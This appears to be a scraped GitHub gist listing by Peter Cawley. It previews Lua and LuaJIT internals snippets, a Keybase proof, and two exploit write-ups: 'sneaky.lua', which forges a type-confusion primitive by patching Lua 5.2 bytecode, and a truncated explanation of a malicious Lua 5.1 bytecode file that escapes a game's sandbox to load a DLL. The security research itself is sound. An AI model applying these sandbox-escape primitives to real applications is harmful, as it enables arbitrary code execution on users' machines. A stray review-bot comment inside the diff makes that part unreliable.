Peter Cawley corsix

corsix / str.lua
Last active Apr 30, 2019
LuaJIT string hash table woes
View str.lua
--- Plumbing
local ffi = require"ffi"
ffi.cdef"char* strstr(const char*, const char*)"
local strstr = ffi.C.strstr
local cast = ffi.cast
-- strstr(s, "") returns a pointer to the string's character data, which in LuaJIT sits
-- directly after the GCstr header (hash and length fields precede the data). Probe the
-- word two slots before the data of "*": if it holds the length 1, the header layout is
-- the wider one and the hash lives three words back; otherwise it lives two words back.
local str_hash_offset = cast("uint32_t*", strstr("*", ""))[-2] == 1 and 3 or 2
-- Return a pointer to the hash field of the interned string s.
local function str_hash(s)
return cast("uint32_t*", strstr(s, "")) - str_hash_offset
end
local table_new = require""
corsix / sneaky.lua
Last active Sep 14, 2016
Exploiting Lua 5.2 on x64
View sneaky.lua
-- double as_num(GCobj* x) { return reinterpret_cast<double>(x); }
local as_num = string.dump(function(...) for n = ..., ..., 0 do return n end end)
as_num = as_num:gsub("\x21", "\x17", 1) -- OP_FORPREP -> OP_JMP
as_num = assert(load(as_num))
-- uint64_t addr_of(GCobj* x) { return reinterpret_cast<uint64_t>(x); }
local function addr_of(x) return as_num(x) * 2^1000 * 2^74 end
-- std::string ub8(uint64_t n) { return std::string(reinterpret_cast<char*>(&n), 8); }
local function ub8(n)
View asm_insn_len.diff
diff --git a/src/lj_asm_x86.h b/src/lj_asm_x86.h
index 718cb12..1c36813 100644
--- a/src/lj_asm_x86.h
+++ b/src/lj_asm_x86.h
@@ -2620,6 +2620,107 @@ static void asm_setup_target(ASMState *as)
/* -- Trace patching ------------------------------------------------------ */
+static const uint8_t map_op1[256] = {
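Review bot: the hunk header reports 101 net added lines beginning at the `map_op1[256]` declaration, but only that declaration is visible here, so the table body cannot be reviewed; a 256-entry static opcode table needs a leading comment stating what each entry encodes and which instruction-length logic consumes it, and it should sit under its own section comment rather than directly beneath `/* -- Trace patching ---- */`.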

Keybase proof

I hereby claim:

  • I am corsix on github.
  • I am corsix on keybase.
  • I have a public key whose fingerprint is C8D1 534F D677 D053 0006 BD34 E1E9 8F2E 5A49 BA6B

To claim this, I am signing this object:

View Exploiting Lua 5.1 on 32-bit

Exploiting Lua 5.1 on 32-bit Windows

The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of the relevant bits of the Lua 5.1 virtual machine.

-- The header of a dumped function encodes the build's word sizes; refuse to run on anything but 32-bit Lua 5.1.
if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
  error("This generator requires a 32-bit version of Lua 5.1")
end

local function outer()
  local magic -- In bytecode, the stack slot corresponding to this local is changed